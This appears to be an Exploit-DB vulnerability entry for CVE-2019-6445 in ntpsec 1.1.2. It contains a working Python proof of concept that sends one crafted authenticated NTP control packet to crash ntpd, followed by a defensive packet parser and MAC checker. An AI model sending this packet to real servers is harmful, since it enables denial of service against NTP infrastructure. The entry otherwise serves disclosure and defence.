Vendor: ntpsec
By: Magnus Klaaborg Stubman
CVSS: 6.5 (MEDIUM)
Title: authenticated NULL pointer exception
CWE: NULL Pointer Dereference
Product Name: ntpsec
Affected Version From: 1.1.2000
Affected Version To: 1.1.2002
Patch Exists: NO
Related CVE: CVE-2019-6445
CPE: cpe:/a:ntpsec_project:ntpsec:1.1.0, cpe:/a:ntpsec_project:ntpsec:1.1.1, cpe:/a:ntpsec_project:ntpsec:1.1.2
Year: 2019

ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept

This proof of concept triggers a NULL pointer exception in ntpsec version 1.1.2, causing a denial-of-service condition. The vulnerability is authenticated: the attacker must hold valid credentials (the PoC uses key ID 1 with the password 'gurka') to exploit it. The exploit sends a single specially crafted UDP packet to the target server, which triggers the NULL pointer exception.

Mitigation:

Update to a version of ntpsec that is not affected by this vulnerability. Alternatively, disable the vulnerable functionality if it is not needed.

Exploit-DB raw data:

#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-npe
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
# CVE: CVE-2019-6445
# Note: this PoC uses Keyid 1 with password 'gurka'

import socket

# One 36-byte NTP mode 6 (control) request, written as a bytes literal so the
# script behaves the same under Python 2 and Python 3:
#   12-byte control header (LI/VN/mode, opcode, sequence, status, association
#   ID, offset, count), 4 bytes of data, then a MAC consisting of the 4-byte
#   key ID (1) and a 16-byte MD5 digest computed with the key noted above.
buf = (b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       b"\x56\xc8\x07\xd4")

# Send the request over UDP to the local ntpd on port 123.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
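As an added example (not part of the Exploit-DB entry or of ntpsec itself), the following Python decodes a captured NTP mode 6 control packet into its header fields, data and MAC, and recomputes the MD5 MAC as defined in RFC 5905 so a defender reviewing a capture can tell an authenticated write request from ordinary traffic. SAMPLE is a constructed byte-for-byte copy of the 36-byte buffer from the PoC above; the function and field names are assumptions.

```python
import hashlib
import hmac
import struct

# Constructed sample: a byte-for-byte copy of the 36-byte buffer in the PoC above.
SAMPLE = bytes.fromhex(
    "160300030000000000000004"           # 12-byte control header, count = 4
    "6c656170"                           # data: the ASCII string "leap"
    "00000001"                           # MAC: key ID 1 ...
    "5cb73cdc9f5c1e6ac59bdff556c807d4")  # ... followed by a 16-byte MD5 digest

def parse_ntp_control(pkt):
    """Decode an NTP mode 6 (control) packet into header fields, data and MAC."""
    if len(pkt) < 12:
        raise ValueError("too short for an NTP control header")
    first, second, seq, status, assoc, offset, count = struct.unpack("!BBHHHHH", pkt[:12])
    if (first & 0x07) != 6:
        raise ValueError("not a mode 6 packet")
    data_end = 12 + count
    if data_end > len(pkt):
        raise ValueError("count field runs past the end of the packet")
    mac = pkt[12 + ((count + 3) & ~3):]  # data is padded to a 4-byte boundary
    return {
        "version": (first >> 3) & 0x07,
        "response": bool(second & 0x80),
        "error": bool(second & 0x40),
        "opcode": second & 0x1F,          # 3 = CTL_OP_WRITEVAR (write variables)
        "sequence": seq,
        "status": status,
        "association": assoc,
        "offset": offset,
        "count": count,
        "data": pkt[12:data_end],
        "authenticated": len(mac) >= 4,
        "keyid": struct.unpack("!I", mac[:4])[0] if len(mac) >= 4 else None,
        "digest_len": max(len(mac) - 4, 0),
    }

def verify_md5_mac(pkt, key):
    """Recompute the RFC 5905 MD5 MAC, MD5(key || packet-without-MAC), and compare it."""
    info = parse_ntp_control(pkt)
    if info["digest_len"] != 16:
        return False
    expected = hashlib.md5(key + pkt[:len(pkt) - 20]).digest()
    return hmac.compare_digest(expected, pkt[-16:])
```

Run against the PoC bytes, the parser reports an authenticated mode 6 write-variables request carrying the 4-byte payload "leap" under key ID 1, which is the shape of request a packet-capture review or IDS rule for this issue would single out.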